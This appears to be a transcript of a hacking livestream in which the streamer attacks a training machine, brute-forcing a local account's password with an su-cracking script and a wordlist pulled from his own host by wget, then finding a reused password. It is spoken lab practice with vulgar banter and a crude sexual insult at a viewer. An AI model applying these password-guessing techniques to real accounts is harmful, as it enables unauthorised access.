Like, this is absolutely disastrous. Whoever wrote this should be shot. Like, how is this confusing at all? Gunner, I'm not molding. I might have a hard time in Bash, but I had no problem bashing your mom between the legs last night. So shut your mouth, sit down, and enjoy the stream. You're not listening. Listen, everybody is telling me different things. Literally every single person is telling me different things. TAC equals is not... I understand it's not basic arithmetic. I'm not doing basic arithmetic here. I am taking the modulus of count and then testing to see if it's equal to 0. How is this complicated, chat? How does chat not understand? So what does it need to be then? What does it need to be? I entered brackets? I tried brackets first. That didn't work. What does it need to be? For absolute fuck's sake. Now people are telling me double brackets. That Doomdle, that's it. Doomdie, that's exactly what it currently is. Pretty much. This is absolutely disastrous. Whoever wrote Bash should be absolutely ashamed of this syntax. This is fucking miserable. So we have ticks. Dollar count mod 20. Wow. What a disastrous fucking syntax. If that works. God. Please. What command? Command not found. You need space. What? You can't just say you need space. That's an ad. That's a fucking ad. Okay? Alright, that's a fucking ad. We're running an ad. Fucking Jesus Christ. People are just like, you need a space. Like, we're like, okay. Like, no indication of where the fucking space is supposed to go. That's a fucking ad, dude. Like, we're doing ads today. Aorus, I'm doing my best, okay? This is disastrous. God, this sucks ass. Oh my god. I've never hated syntax so much as this. Well, now it seems to at least be working because I put spaces in. I guess it's working, maybe. Dark Eldar with the 5 new cult initiates. Digital Silicon, Digital Warhead, Ghosts Are Spooky. Alizin, is it Alizin? And Professor Dragmire, welcome to the All Eyes Red team. Well, it seems to be doing its thing now, so that's good, I guess. Oreo Bite, welcome back to the stream. Welcome back to the stream, Oreo Bite. Welcome. Welcome. Let me ask you a question, though. How does installing SuCrack on my Kali help me escalate, help me use SuCrack on the target? One Skelpy, thank you for the follow. Best stream ever? I wouldn't say it's the best stream ever. It's just, God, that was all this ever for a rabbit hole. It's fine. It's all about learning, ultimately. Ultimately, it's just all about learning. Ghost with the 100 Tegel biddies. Sitting at Haneda Airport waiting to go to Okinawa. I'm glad you're still on.
I'm glad you're still on.
Oh, Haneda's a nice airport. I liked Narita more. Narita was, like, just absolutely massive and super nice. How many username, how many words did we have in this crack.list? list? Let's do WC. So, quite a few, as it turns out. I could have done unique. Sort tech U, unique. It's basically no different. Well, unfortunately, I can't get another shell because I'm running as the web server. I can't do SSH either because we're not a normal user on the box. Okay, so at this point, I need to ask, am I on the right track here? Because I need to know if we should continue with this, or if we're down a rabbit hole. So, someone... Oh, this is the right path. Oh my god, I'm such a giga-fucking brain. Hopefully... Okay, so... This is not a rabbit hole. Oh, thank god. Thank god. I mean, I don't know if we can just, You did it without finding one of the passwords. Okay, well... What do you mean without finding one of the passwords, which is impressive? What do you mean? Like, I saw a whole bunch of the passwords. The passwords have common patterns in them. You can see that here. Password 123 after each one of them, and the live application has pretty secure password. I mean, it seems pretty straightforward. There was another password? I don't know. The pattern seems pretty obvious here. Just keep telling him it's the right path. Well, you're the ones who have to watch this stupid incrementing bash script over and over again. No, I feel like the pattern is pretty obvious from here. Oh, Stream Raiders. Clearly the list... I mean, I don't know how to filter the list. It's probably... I mean, the other ones had, like, a keyword that made sense in the context. Like, it was, like, spring password, or it was key store password, or something like that. If there was another password that I missed, I should probably double check. If there was another password I missed. I should have checked that one. I thought I might have just gotten all the passwords because I saw the Git. I saw the Git repo. Someone get Ja Rule on the phone to plan Maldfest? Oh God, please no. Please no. Oh, let's do, we have nothing else to do, so let's do trivia. Let's do trivia. Let's see. A good trivia question. Okay, quick and dirty. Quick and dirty. Again, please don't answer unless you're in the Stream Raiders battle. You all try and troll me on this, but please don't answer unless you're in the... If you say Captain Crunch, you're automatically disqualified, okay? If you say Captain Crunch, you're automatically disqualified. What's the worst fucking scripting language of all time? Yeah, that would have been a good one. Which old one is known as the Crawling Chaos? It's not Batman, okay? J Beers. Nobody knows what Google is, huh? Nobody knows how Google works. You understand it's okay to Google this stuff. There you go. Ghost gets it. Nyarlathotep. And it looks like Ghost is not in the Stream Raiders battle, as is tradition. But Technique got it right after him, and he is. So we'll confirm it. There we go. Good job, Technique. Well, we're still going with this thing. We're still going with this thing. We're hammering away at it. Big Mac with the first time indoctrination into the cult. Welcome to the All Has Red team, my friend. Thanks for supporting the stream.
A hunter must hunt.
Holy shit. Should I just let this run off stream, maybe? I don't know how long this is going to take, and we're already approaching 4 hours here. My goodness, Big Mac. Big Mac, you're so kind. Thank you so much. 5 new cult initiates. Wokeen Phoenix, Lunaher, Paramiko, Beam Me Up, and Ryan is Nub. Welcome to the All Has Red team, my friends. Thank you so much, Big Mac, for joining the cult and then indoctrinating 5 new members. I love the streams. I'm a 1 Bravo far trying to go Oko. That's nice. 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 Welcome to the stream. I was, yeah, that makes sense. I was a 17 Sierra when I was in. I was on the officer side, but I wanted to be a 1 Bravo 4. I can give you the first and the last letter, and I can also guess what it is from that. Okay, well, I guess do that so we can go faster, I suppose. So capital A and lowercase t? It's probably something I could have easily guessed, isn't it? Grep, tac E, start of string, capital A, lowercase t, end of string. Pipe that into less. Nothing. Oh, I forgot the beginning and ending. So it's going to be pretty secure A, and then it's going to be password 123 period. Like that. Okay, so it's one of these then? Let's try that. Weaned.list. Okay, kill this. wget http://10.2.54.80. Is that my IP address? .84.81. So close. 10.2.54.81 weaned.list. Watch this dumb script be failing me for some reason. Excuse me. Okay, none of those worked. None of those worked. So I don't know if this script just doesn't work. Do you miss Yokota? I do miss Yokota. Yokota was super nice. What do you think of the GCIH and going from that into the OSTP? Well, if you can get the military to pay for GCIH, it's probably great. I got GCFA while I was still in, and then I went for OSTP outside of it. Rabbit hole? No, it's already been confirmed to not be a rabbit hole. A ends in T. Well, I mean, I'll take your word for it on that. I wonder if this script just doesn't work for some reason. I mean, we are trusting this. We're trusting this this cracking word list to work. We're testing this cracking stream. This cracking shell script to work. I could try the script against a known user on my Kali. The problem with that is, you're all in the stream, so I'm gonna have to do it off stream because I don't want you to see my password. So we're gonna move it over here. You can look at my waifu a little bit. Waifu stream all of a sudden. Okay, it's waifu stream. Let me try the script on my Kali over here. I could just make a new user. Her name is not Melina. Not Melina. Melina's a different character from Elden Ring. I am trying it right now. It does not work. It did not correctly... Oh, maybe I had the password wrong. Excuse me. Like, there we go. Alright, I must have typed it wrong. Alright, let's try it now with the correct password in there. Can't remember my own root password. Okay, no, it does work on my host, Callie. It does work on my host, Callie machine. It does work on Callie. I've changed the password now, Chad. It's not test password. I changed the password back to... I couldn't remember what the password was for root, so I changed it to test password, and then I changed it to something else. I just found a YouTube video, and it's what I expected. Huh. So you guessed it with capital A and lowercase t? Based on what the others were. Well, the others are Key Store and Spring. I mean, the word list must be wrong if it's not working. We're trying to just log into the box, to the user account on the box. Then we tried the host name of the box. We tried... Applet might work. Yeah, I think you're probably... that one does make sense. Is Applet even in here, though? I'm not sure that Applet would have even been in Rock U. So what is it? What is it? So it's... like this, and then it's applet? Which I guess makes sense, because this is a Java app. I don't know if I pasted it correctly. Nope, that does not work. Pretty secure applet password. I mean, I might not be pasting it. It should be pasting it. That does not work. So it looks like that is not the correct password. Maybe Tomcat password? You said applet. Husky said applet. Like, I see that. Pretty secure. Applet password 123. Like, and you said that was correct. Yeah, it wasn't applet? Okay, well, you said ding, ding, ding. You said ding, ding, ding. Ding, ding, ding. Husky says applet, you go ding, ding, ding. Account would make sense. Let's try account. Okay, well that was... Okay, well, okay, that was your ding, ding, ding. Fair enough. You should have specified what the ding, ding, ding was for. Okay? You should have specified what the ding, ding, ding was for. But we got John Smith, okay? Good work, team. We did it. Was account even in here? I'm pretty sure account was not even in here, so I didn't use the correct word. My word list was fucked up. I mean, it probably was in there, and it just wasn't... It was probably in there and just not capitalized. So I probably had to do the thing where I just had to capitalize every single word in Rock U, which I didn't want to do because that was going to take fucking forever. Oh, it was in there. It was in there, but it just didn't crack. It was in there and just didn't crack over here. So, yeah, it was maybe the broken pipe thing. Okay, well. This was a team effort box, okay? This is still password I mean, yeah, it is password reuse. This is, I mean, that is very realistic. The problem is there's like no way to, it's very subtly indicated. I think that was a good vector. It was a good vector, I think. I don't know why the script didn't work, but we're using some random bash script off of Git, and we've already realized how shitty bash is. All right, I think we're gonna have to finish this one next time, guys. I think the next one is gonna take a while to figure out. I think I know vaguely what we need to do. We need to decide on something to write to. We need to decide on something to write to. So the next time on the next fantastic installment of Dark Magic with Al, we will be getting root on this machine. So that'll be Sunday. How's Star doing? Let me see. Sweet pea. Say hi to the stream. I just woke her up from a nap in my bed, which she is not happy about. The stream wanted to see you. You're adoring public. That's your adoring public. Oh. Hi, honey. All right. Any questions about that machine? I thought it was a good machine, honestly. People are saying it's bad. The only thing that's bad that we had to deal with today was bash. Bash is syntax. Wow. Jeez. But we did get there. We did get there. And the script didn't even work. Like, maybe it was the broken pipe thing that did it. Spaces! Remove the spaces! Put braces instead of parentheses. Back ticks. Like, it was a disaster. What a disaster. Who are we? Tiberius says he's doing a charity stream. Hey, Tibbs, if you decide to do a charity stream, let me know, and I'll and if it overlaps with my stream, I'll just host you rather than actually streaming. We could even collab on it if you wanted to. But I don't want to overlap. If you're doing a charity stream, I don't want to overlap with you and suck viewers away from you. So let me know if you do that. Just coordinate. 12 to 12 Eastern. Okay, I'll just host you, and I will host you, and perhaps we can collab. Maybe I can hop on Discord or something and do something with you. So perhaps we won't do Fun Day Sunday as scheduled, just because I want to support Tiberius. So perhaps Fun Day Sunday will be a little bit different. Look out for information on that, okay? But the next time we stream, we will go ahead and finish up this bad boy. But I don't want to suck viewers away from Tiberius if he's doing charity stream. Or in general. So we're going to raid Dino Dan. We do love Dino Dan. I'm glad you guys enjoyed tonight. I certainly enjoyed it. Other than Bash. The only part I really hated about tonight was Bash. The rest of it was interesting and unique. Damn, this box was a stumper. Yeah, it took a little while. We didn't get root on this one. We got 2 flags out of 3, but the root is going to take a little while. And we're already over 4 hours in. So I'm just going to call it, and we'll finish it up next time I stream. Go to bed tonight knowing a little bit more than you did yesterday. I'll see you guys again when the stars are right. I'm on Discord if you have any questions, comments, threats, bribes. Have a good evening or day or whatever time it is, wherever you are. Get vaccinated. Stay safe.